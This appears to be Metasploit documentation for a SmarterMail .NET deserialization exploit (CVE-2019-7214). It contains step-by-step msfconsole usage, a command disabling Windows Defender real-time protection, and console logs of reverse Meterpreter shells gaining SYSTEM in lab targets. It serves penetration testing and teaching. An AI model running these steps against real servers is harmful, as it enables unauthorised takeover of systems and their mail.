15 KiB
15 KiB
Vulnerable Application
The vulnerability affects:
* SmarterTools SmarterMail Version <= 16.3.6989.16341 (all legacy versions without a build number)
* SmarterTools SmarterMail Build < 6985
Description
This module exploits a vulnerability in the SmarterTools SmarterMail software for
version numbers <= 16.x or for build numbers < 6985. The vulnerable versions and builds
expose three .NET remoting endpoints on port 17001, namely /Servers, /Mail and /Spool.
For example, a typical installation of SmarterMail Build 6970 will have the /Servers endpoint
exposed to the public at tcp://0.0.0.0:17001/Servers, where serialized .NET commands can be sent
through a TCP socket connection.
The three endpoints perform deserialization of untrusted data (CVE-2019-7214), allowing an attacker
to send arbitrary commands to be deserialized and executed. This module exploits this vulnerability
to perform .NET deserialization attacks, allowing remote code execution for any unauthenticated user
under the context of the SYSTEM account. Successful exploitation results in full administrative
control of the target server under the NT AUTHORITY\SYSTEM account.
This vulnerability was patched in Build 6985, where the 17001 port is no longer publicly accessible,
although it can be accessible locally at 127.0.0.1:17001. Hence, this would still allow for a
privilege escalation vector if the server is compromised as a low-privileged user.
Setup
This module was tested on SmarterMail Build 6919, 6970 (with positive results), Build 6985 (with negative results), and on Version 16.3.6989 (with positive results).
Legacy builds and versions of SmarterMail can be obtained by signing up to the
SmarterTools website to create a user account, and then navigating to the
Legacy Builds page, where EXE
and MSI files can be downloaded.
Verification Steps
- Sign up to the SmarterTools website. Log in with your created account.
- Download
EXElegacy versions and builds from a dropdown menu at Legacy Builds, specifically SmarterMail 16.x, Build 6970 and Build 6985. - Install the executable file (e.g.
SmarterMail_6970.exe) and follow the instructions provided. If reinstalling a different version/build, simply chooseUse an existing sitewhen prompted inSite Configuration Type, and selectSmarterMailin the next option. - Verify that the login page can be accessed at
http://localhost:9998/interface/root#/login. Set Admin username and password to beadmin:admin(or anything arbitrary) if prompted. - Disable realtime protection on an Administrative PowerShell session with
Set-MpPreference -DisableRealtimeMonitoring $true. - Start
msfconsoleand follow along with default options. - Do:
use exploit/windows/http/smartermail_rce - Do:
set RHOSTS [SMARTERMAIL_SERVER_IP] - Do:
set LHOST eth0 - Do:
exploit
Options
TARGET (Required)
0. Target 0 (default) - Windows Command uses a default PowerShell payload to execute
code and open a Meterpreter session. However, any desired payload can be chosen. Choose with `set TARGET 0`.
1. Target 1 - x86/x64 Windows CmdStager uses a CmdStager with default `vbs` stager flavor to execute code
and open a Meterpreter session. Choose with `set TARGET 1`.
ENDPOINT (Required)
Choose one of three exposed .NET remoting endpoints, either Servers, Spool or Mail.
The default is Servers, but any one of the three will do.
RPORT (Required)
This is the port for the SmarterMail HTTP server, which is default on port 9998. Although this port is not required for exploitation, it is required for checking the vulnerability and version/build number of the SmarterMail software.
TARGETURI (Required)
This is the base path of the SmarterMail HTTP server. The vulnerability check follows the
redirect from base path / to the login page at /interface/root#/login, but this option
is provided in case the login page is located at a different URI.
TCP_PORT (Required)
This is the TCP port where the .NET remoting endpoints are located, and is required for sending serialized data and Meterpreter payloads. The default port is 17001.
Scenarios
SmarterMail Build 6970 on Windows 10 Pro
- Using default TARGET 0 - Windows Command
msf6 > use exploit/windows/http/smartermail_rce
[*] Using configured payload cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/http/smartermail_rce) > set RHOSTS 192.168.29.1
RHOSTS => 192.168.29.1
msf6 exploit(windows/http/smartermail_rce) > set LHOST eth0
LHOST => 192.168.245.128
msf6 exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6970.
[+] The target appears to be vulnerable.
[*] Sending stage (175686 bytes) to 192.168.245.1
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.1:51164) at 2023-07-07 03:30:47 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-50BU5J8
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
- Using TARGET 1 - x86/x64 Windows CmdStager:
msf6 > use exploit/windows/http/smartermail_rce
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/smartermail_rce) > set TARGET 1
TARGET => 1
msf6 exploit(windows/http/smartermail_rce) > set RHOSTS 192.168.29.1
RHOSTS => 192.168.29.1
msf6 exploit(windows/http/smartermail_rce) > set LHOST eth0
LHOST => eth0
msf6 exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6970.
[+] The target appears to be vulnerable.
[*] Command Stager progress - 2.01% done (2046/101881 bytes)
[*] Command Stager progress - 4.02% done (4092/101881 bytes)
[*] Command Stager progress - 6.02% done (6138/101881 bytes)
[*] Command Stager progress - 8.03% done (8184/101881 bytes)
[*] Command Stager progress - 10.04% done (10230/101881 bytes)
[*] Command Stager progress - 12.05% done (12276/101881 bytes)
[*] Command Stager progress - 14.06% done (14322/101881 bytes)
[*] Command Stager progress - 16.07% done (16368/101881 bytes)
[*] Command Stager progress - 18.07% done (18414/101881 bytes)
[*] Command Stager progress - 20.08% done (20460/101881 bytes)
[*] Command Stager progress - 22.09% done (22506/101881 bytes)
[*] Command Stager progress - 24.10% done (24552/101881 bytes)
[*] Command Stager progress - 26.11% done (26598/101881 bytes)
[*] Command Stager progress - 28.12% done (28644/101881 bytes)
[*] Command Stager progress - 30.12% done (30690/101881 bytes)
[*] Command Stager progress - 32.13% done (32736/101881 bytes)
[*] Command Stager progress - 34.14% done (34782/101881 bytes)
[*] Command Stager progress - 36.15% done (36828/101881 bytes)
[*] Command Stager progress - 38.16% done (38874/101881 bytes)
[*] Command Stager progress - 40.16% done (40920/101881 bytes)
[*] Command Stager progress - 42.17% done (42966/101881 bytes)
[*] Command Stager progress - 44.18% done (45012/101881 bytes)
[*] Command Stager progress - 46.19% done (47058/101881 bytes)
[*] Command Stager progress - 48.20% done (49104/101881 bytes)
[*] Command Stager progress - 50.21% done (51150/101881 bytes)
[*] Command Stager progress - 52.21% done (53196/101881 bytes)
[*] Command Stager progress - 54.22% done (55242/101881 bytes)
[*] Command Stager progress - 56.23% done (57288/101881 bytes)
[*] Command Stager progress - 58.24% done (59334/101881 bytes)
[*] Command Stager progress - 60.25% done (61380/101881 bytes)
[*] Command Stager progress - 62.25% done (63426/101881 bytes)
[*] Command Stager progress - 64.26% done (65472/101881 bytes)
[*] Command Stager progress - 66.27% done (67518/101881 bytes)
[*] Command Stager progress - 68.28% done (69564/101881 bytes)
[*] Command Stager progress - 70.29% done (71610/101881 bytes)
[*] Command Stager progress - 72.30% done (73656/101881 bytes)
[*] Command Stager progress - 74.30% done (75702/101881 bytes)
[*] Command Stager progress - 76.31% done (77748/101881 bytes)
[*] Command Stager progress - 78.32% done (79794/101881 bytes)
[*] Command Stager progress - 80.33% done (81840/101881 bytes)
[*] Command Stager progress - 82.34% done (83886/101881 bytes)
[*] Command Stager progress - 84.35% done (85932/101881 bytes)
[*] Command Stager progress - 86.35% done (87978/101881 bytes)
[*] Command Stager progress - 88.36% done (90024/101881 bytes)
[*] Command Stager progress - 90.37% done (92070/101881 bytes)
[*] Command Stager progress - 92.38% done (94116/101881 bytes)
[*] Command Stager progress - 94.39% done (96162/101881 bytes)
[*] Command Stager progress - 96.39% done (98208/101881 bytes)
[*] Command Stager progress - 98.40% done (100252/101881 bytes)
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Sending stage (175686 bytes) to 192.168.245.1
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.1:55099) at 2023-07-06 05:43:26 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-50BU5J8
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
SmarterMail Version 16.3.6989 on Windows 10 Pro
- Using ENDPOINT
Mail:
msf6 > use exploit/windows/http/smartermail_rce
[*] Using configured payload cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/http/smartermail_rce) > set ENDPOINT Mail
ENDPOINT => Mail
msf6 exploit(windows/http/smartermail_rce) > set RHOSTS 192.168.29.1
RHOSTS => 192.168.29.1
msf6 exploit(windows/http/smartermail_rce) > set LHOST eth0
LHOST => eth0
msf6 exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[!] Product build not found. 16.x versions and below do not have a build number.
[*] Checking SmarterMail product version...
[+] Target is running SmarterMail Version 16.3.6989.
[+] The target appears to be vulnerable.
[*] Sending stage (175686 bytes) to 192.168.245.1
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.1:55147) at 2023-07-06 06:20:19 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-50BU5J8
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
SmarterMail Build 6985 on Windows 10 Pro
msf6 > use exploit/windows/http/smartermail_rce
[*] Using configured payload cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/http/smartermail_rce) > set RHOSTS 192.168.29.1
RHOSTS => 192.168.29.1
msf6 exploit(windows/http/smartermail_rce) > set LHOST eth0
LHOST => eth0
msf6 exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6985.
[*] Checking SmarterMail product version...
[+] Target is running SmarterMail Version 100.0.6985.
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/smartermail_rce) > set ForceExploit true
ForceExploit => true
msf6 exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6985.
[*] Checking SmarterMail product version...
[+] Target is running SmarterMail Version 100.0.6985.
[!] The target is not exploitable. ForceExploit is enabled, proceeding with exploitation.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/smartermail_rce) >
SmarterMail Build 6919 on Windows 10 Pro (Algernon from Proving Grounds Practice)
msf6 > use exploit/windows/http/smartermail_rce
[*] Using configured payload cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/http/smartermail_rce) > set RHOSTS 192.168.247.65
RHOSTS => 192.168.247.65
msf6 exploit(windows/http/smartermail_rce) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/http/smartermail_rce) > check
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6919.
[*] 192.168.247.65:9998 - The target appears to be vulnerable.
msf6 exploit(windows/http/smartermail_rce) > exploit
[*] Started reverse TCP handler on 192.168.45.188:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response...
[+] Target is running SmarterMail.
[*] Checking SmarterMail product build...
[+] Target is running SmarterMail Build 6919.
[+] The target appears to be vulnerable.
[*] Sending stage (175686 bytes) to 192.168.247.65
[*] Meterpreter session 1 opened (192.168.45.188:4444 -> 192.168.247.65:49710) at 2023-07-06 07:24:13 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : ALGERNON
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x86/windows
meterpreter > shell
Process 4240 created.
Channel 1 created.
Microsoft Windows [Version 10.0.18363.815]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
84b4****************************
C:\Users\Administrator\Desktop>